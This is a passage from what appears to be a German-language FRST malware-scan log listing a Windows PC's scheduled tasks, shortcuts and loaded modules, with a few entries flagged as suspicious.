Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {709DF1A0-05D5-4212-A64F-3E935E5E0E21} - System32\Tasks\Driver Booster SkipUAC (*****) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe [2017-05-03] (IObit)
Task: {747EDABD-FFCF-4A4A-9090-6FB45E52DF32} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\4 => C:\Program Files\SmartTechnology\Software\SaiMfd.exe [2013-04-16] (Saitek)
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8161C861-2F39-4F66-9738-F0E729E543F8} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\4 => G:\Games\World_of_Warships\WargamingGameUpdater.exe [2017-06-02] (Wargaming.net) <==== ACHTUNG
Task: {841B981A-ABD1-49B5-9670-3344025F09FD} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\3 => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [2016-11-16] (Samsung Electronics Co., Ltd.)
Task: {8C2C2E44-4C80-4443-B5F3-75EBC05B98DF} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\1 => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [2017-05-08] (TomTom) <==== ACHTUNG
Task: {8CD60BBA-13BE-4C72-9BD2-F7665F5A12E1} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\1 => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [2012-09-13] (Logitech Inc.)
Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {9F40D7E3-13EC-42F1-B658-3B8834985725} - System32\Tasks\Avira\System Speedup\TestScheduler => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [2017-06-28] (Avira Operations GmbH & Co. KG)
Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation)
Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {A59EC191-5863-4668-8DC4-E3B297762399} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\3 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {AD2988BE-BBBA-47A2-9FE4-E814CB5C6B95} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\10 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) <==== ACHTUNG
Task: {B15A2E8C-80BE-49E7-93D9-77E6DB8733A2} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\Scheduler.exe [2017-03-28] (IObit)
Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation)
Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {B8F24EEC-1F14-4791-AFC9-1BB058D7BAA4} - System32\Tasks\Uninstaller_SkipUac_Martin_Walser => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2017-01-19] (IObit)
Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {BDBA9F4F-934F-471F-9115-BE63D26C1662} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\13 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [2017-05-17] (IObit) <==== ACHTUNG
Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D4B0982F-B146-48F0-85ED-8BC5CF94050B} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\5 => C:\WINDOWS\System\3DG4me.exe
Task: {D5103FCE-77CB-4D47-A4F1-5D28A4A4ED16} - System32\Tasks\AviraSystemSpeedupUpdate => C:\ProgramData\Avira\SystemSpeedup\Update\avira_speedup_setup_update.exe [2017-07-11] (Avira Operations GmbH & Co. KG                              )
Task: {D717F808-00FE-473D-9D5C-9010C610A490} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\6 => G:\Program Files (x86)\Steam\steam.exe [2017-07-18] (Valve Corporation) <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {DBC40A0D-D57C-4753-B5DE-B1900FC79412} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\2 => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
Task: {E7FD477B-E42F-486D-87DC-17D9865373CD} - System32\Tasks\SmartDefrag_Startup => C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe [2017-05-31] (IObit)
Task: {EA62DC1E-9D06-46DB-9B67-3FB813C4E777} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\7 => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [2017-06-28] (Avira Operations GmbH & Co. KG) <==== ACHTUNG
Task: {F5EF43DC-B84B-4E3D-9B94-D72B394C253C} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\5 => C:\Users\*****\AppData\Local\Akamai\netsession_win.exe [2017-01-03] (Akamai Technologies, Inc.) <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\StartMenu8_Start.job => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe
Task: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_Walser.job => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe
Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_Walser.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-04-19 20:10 - 2017-07-19 01:24 - 000133568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2017-06-23 19:21 - 2017-06-23 19:21 - 001199816 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Word.dll
2017-06-23 19:21 - 2017-06-23 19:21 - 013207232 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8241.41275.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll
2017-07-14 19:07 - 2017-07-12 22:01 - 000025408 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\QtWebEngineProcess.exe
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-08-01 01:54 - 2017-07-25 09:42 - 003824472 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.78\libglesv2.dll
2017-08-01 01:54 - 2017-07-25 09:42 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.78\libegl.dll
2017-03-13 19:39 - 2016-06-21 20:30 - 000442144 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
2017-03-13 19:39 - 2016-06-21 20:29 - 000210720 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
2017-03-13 19:39 - 2016-06-21 20:29 - 000059680 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2017-06-06 17:27 - 2016-08-18 18:43 - 000442144 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madExcept_.bpl
2017-06-06 17:27 - 2016-08-18 18:43 - 000210720 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madBasic_.bpl
2017-06-06 17:27 - 2016-08-18 18:43 - 000059680 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\madDisAsm_.bpl
2017-06-06 17:27 - 2016-11-01 10:11 - 000078624 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\GetProcessDLL.dll
2017-06-08 20:20 - 2016-01-11 17:03 - 000899872 _____ () C:\Program Files (x86)\IObit\Smart Defrag\webres.dll
2017-06-08 20:20 - 2016-01-11 17:02 - 000630048 _____ () C:\Program Files (x86)\IObit\Smart Defrag\ProductStatistics.dll
2017-06-06 17:27 - 2015-12-28 13:50 - 000899872 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\webres.dll
2017-06-06 17:27 - 2017-05-17 13:45 - 000631584 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\ProductStatistics.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 002144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 007955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 000336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000878592 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\platforms\qwindows.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000036352 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qgenericbearer.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000038912 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qnativerwifibearer.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000032256 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qdds.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qgif.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000027648 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qicns.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qico.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000381952 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjp2.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000204800 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjpeg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000218112 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qmng.dll
2014-09-11 17:08 - 2014-09-11 17:08 - 000015872 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qsvg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000015360 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtga.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000307712 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtiff.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000014848 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwbmp.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000252928 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwebp.dll
2017-01-29 16:41 - 2017-07-26 19:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-04-09 00:35 - 2016-04-09 00:35 - 003481600 _____ () C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\gpuploader_i18n.dll
2017-04-13 21:54 - 2017-07-26 19:08 - 069820864 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2017-06-01 23:04 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\SDL2.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 004969248 _____ () G:\Program Files (x86)\Steam\v8.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 002497824 _____ () G:\Program Files (x86)\Steam\video.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000332800 _____ () G:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000491008 _____ () G:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 002549760 _____ () G:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000485888 _____ () G:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000442880 _____ () G:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001195296 _____ () G:\Program Files (x86)\Steam\icuuc.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001563936 _____ () G:\Program Files (x86)\Steam\icui18n.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000884512 _____ () G:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-18 00:47 - 2016-07-05 00:17 - 000266560 _____ () G:\Program Files (x86)\Steam\openvr_api.dll
2017-06-08 20:06 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-12 19:34 - 2017-07-06 19:58 - 073088800 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000384288 _____ () G:\Program Files (x86)\Steam\steam.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000114664 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\zlib1.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000024040 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_system-vc120-mt-1_56.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000048104 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_date_time-vc120-mt-1_56.dll
2017-05-06 18:04 - 2017-04-27 13:54 - 000108008 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_filesystem-vc120-mt-1_56.dll
2017-03-11 14:34 - 2015-12-29 12:29 - 000190240 _____ () C:\Program Files (x86)\IObit\Classic Start\madBasic_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000355616 _____ () C:\Program Files (x86)\IObit\Classic Start\madExcept_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000057632 _____ () C:\Program Files (x86)\IObit\Classic Start\madDisAsm_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000059680 _____ () C:\Program Files (x86)\IObit\Classic Start\parseAuto.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000275576 _____ () C:\Program Files (x86)\IObit\Classic Start\sqlite3.dll
2017-03-11 14:34 - 2015-12-29 12:31 - 000047904 _____ () C:\Program Files (x86)\IObit\Classic Start\winkey.dll
2017-03-06 22:52 - 2017-01-04 15:28 - 001958912 _____ () C:\Users\*****\AppData\Local\Discord\app-0.0.297\ffmpeg.dll
2017-03-06 22:52 - 2017-03-06 22:52 - 001082880 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_voice\discord_voice.node
2017-03-06 22:52 - 2017-03-06 22:52 - 003750400 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_voice\libdiscord.dll
2017-03-06 22:52 - 2017-03-06 22:52 - 000914432 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_utils\discord_utils.node
2017-03-06 22:52 - 2017-03-06 22:52 - 001127424 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_toaster\discord_toaster.node
2017-03-06 22:52 - 2017-01-04 15:28 - 002278912 _____ () C:\Users\*****\AppData\Local\Discord\app-0.0.297\libglesv2.dll
2017-03-06 22:52 - 2017-01-04 15:28 - 000096768 _____ () C:\Users\*****\AppData\Local\Discord\app-0.0.297\libegl.dll
2017-08-01 13:37 - 2017-08-01 13:37 - 000148992 _____ () \\?\C:\Users\*****\AppData\Local\Temp\72CA.tmp.node
2017-03-06 22:52 - 2017-04-27 20:44 - 002658296 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_rpc\discord_rpc.node
2017-03-06 22:52 - 2017-03-22 20:44 - 002665976 _____ () \\?\C:\Users\*****\AppData\Roaming\discord\0.0.297\modules\discord_contact_import\discord_contact_import.node
2017-07-14 19:07 - 2017-07-12 21:58 - 000746816 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox_watchdog.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 001787200 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox_crashpad.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 000100296 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000018888 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\select.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000020800 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000035792 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000021848 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000125904 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000694224 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 001862992 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000145864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000020432 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000116688 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 000105928 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32api.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.crt.compiled._winffi_crt.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000062784 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000040248 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\fastpath.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000024528 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32event.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000392656 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2017-07-14 19:07 - 2017-07-12 21:58 - 000020936 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000116176 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32security.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000392512 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000124880 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32file.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000026456 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.kernel32.compiled._winffi_kernel32.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000024016 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000175560 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32gui.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000030160 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000043472 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32process.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000048592 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32service.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000057808 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32evtlog.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000024016 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32profile.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000022336 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000082264 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winenumhandles.compiled._WinEnumHandles.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000025432 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000027488 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox.infinite.win.compiled._driverinstallation.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 003928896 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000083912 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\sip.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 001826104 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 001972024 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000028616 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32ts.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000171336 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebEngineWidgets.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000042816 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebChannel.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000531264 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000133432 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000224064 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000207680 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000060880 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32print.pyd
